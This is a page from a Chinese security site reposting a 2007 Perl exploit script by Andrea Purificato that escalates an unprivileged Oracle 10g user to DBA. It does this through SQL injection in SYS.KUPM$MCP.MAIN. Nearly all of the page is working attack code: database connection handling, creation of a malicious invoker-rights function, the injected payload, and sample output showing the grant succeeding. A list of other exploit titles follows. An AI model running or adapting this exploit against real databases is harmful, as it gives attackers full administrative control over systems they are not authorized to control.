手机
当前位置:查字典教程网 >网络安全 >Exploit >Oracle 10g KUPM$MCP.MAIN SQL Injection Exploit
Oracle 10g KUPM$MCP.MAIN SQL Injection Exploit
摘要:#!/usr/bin/perl##RemoteOracleKUPM$MCP.MAINexploit(10g)##Grantorrevoked...

#!/usr/bin/perl

#

# Remote Oracle KUPM$MCP.MAIN exploit (10g)

#

# Grant or revoke dba permission to unprivileged user

#

# Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0"

#

# REF: http://www.red-database-security.com/

#

# AUTHOR: Andrea "bunker" Purificato

# http://rawlab.mindcreations.com

#

# DATE: Copyright 2007 - Tue Mar 27 10:47:14 CEST 2007

#

# Oracle InstantClient (basic sdk) required for DBD::Oracle

#

# bunker@fin:~$ perl kupm-mcpmain.pl -h localhost -s test -u bunker -p **** -r

# [-] Wait...

# [-] Revoking DBA from BUNKER...

# DBD::Oracle::db do failed: ORA-01951: ROLE 'DBA' not granted to 'BUNKER' (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM BUNKER"] at kupm-mcpmain.pl line 97.

# [-] Done!

#

# bunker@fin:~$ perl kupm-mcpmain.pl -h localhost -s test -u bunker -p **** -g

# [-] Wait...

# [-] Creating evil function...

# [-] Go ...(don't worry about errors)!

# DBD::Oracle::st execute failed: ORA-06512: at "SYS.KUPM$MCP", line 874

# ORA-06512: at line 3 (DBD ERROR: OCIStmtExecute) [for Statement "

# BEGIN

# SYS.KUPM$MCP.MAIN(''' AND 0=BUNKER.own--','');

# END;"] at kupm-mcpmain.pl line 119.

# [-] YOU GOT THE POWAH!!

#

# bunker@fin:~$ perl kupm-mcpmain.pl -h localhost -s test -u bunker -p **** -r

# [-] Wait...

# [-] Revoking DBA from BUNKER...

# [-] Done!

#

use warnings;

use strict;

use DBI;

use Getopt::Std;

use vars qw/ %opt /;

sub usage {

print <<"USAGE";

Syntax: $0 -h <host> -s <sid> -u <user> -p <passwd> -g|-r [-P <port>]

Options:

-h <host> target server address

-s <sid> target sid name

-u <user> user

-p <passwd> password

-g|-r (g)rant dba to user | (r)evoke dba from user

[-P <port> Oracle port]

USAGE

exit 0

}

my $opt_string = 'h:s:u:p:grP:';

getopts($opt_string, %opt) or &usage;

&usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} );

&usage if ( !$opt{g} and !$opt{r} );

my $user = uc $opt{u};

my $dbh = undef;

if ($opt{P}) {

$dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die;

} else {

$dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die;

}

my $sqlcmd = "GRANT ALL PRIVILEGE, DBA TO $user";

print "[-] Wait...n";

if ($opt{r}) {

print "[-] Revoking DBA from $user...n";

$sqlcmd = "REVOKE DBA FROM $user";

$dbh->do( $sqlcmd );

print "[-] Done!n";

$dbh->disconnect;

exit;

}

print "[-] Creating evil function...n";

$dbh->do( qq{

CREATE OR REPLACE FUNCTION OWN RETURN NUMBER

AUTHID CURRENT_USER AS

PRAGMA AUTONOMOUS_TRANSACTION;

BEGIN

EXECUTE IMMEDIATE '$sqlcmd'; COMMIT;

RETURN(0);

END;

} );

print "[-] Go ...(don't worry about errors)!n";

my $sth = $dbh->prepare( qq{

BEGIN

SYS.KUPM$MCP.MAIN(''' AND 0=$user.own--','');

END;});

$sth->execute;

$sth->finish;

print "[-] YOU GOT THE POWAH!!n";

$dbh->disconnect;

exit;

【Oracle 10g KUPM$MCP.MAIN SQL Injection Exploit】相关文章:

Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF Exploit

AlstraSoft Affiliate Network Pro (pgm) Remote SQL Injection Vulnerability

Rianxosencabos CMS 0.9 Remote Add Admin Exploit

LoveCMS 1.6.2 Final Remote Code Execution Exploit

Joomla Component DT Register Remote SQL injection Vulnerability

Dana IRC 1.4a Remote Buffer Overflow Exploit

phsBlog 0.2 Bypass SQL Injection Filtering Exploit

Debian Sarge Multiple IMAP Server Denial of Service Exploit

MS Internet Explorer (FTP Server Response) DoS Exploit

Maian Music 1.0 Insecure Cookie Handling Vulnerability

精品推荐
分类导航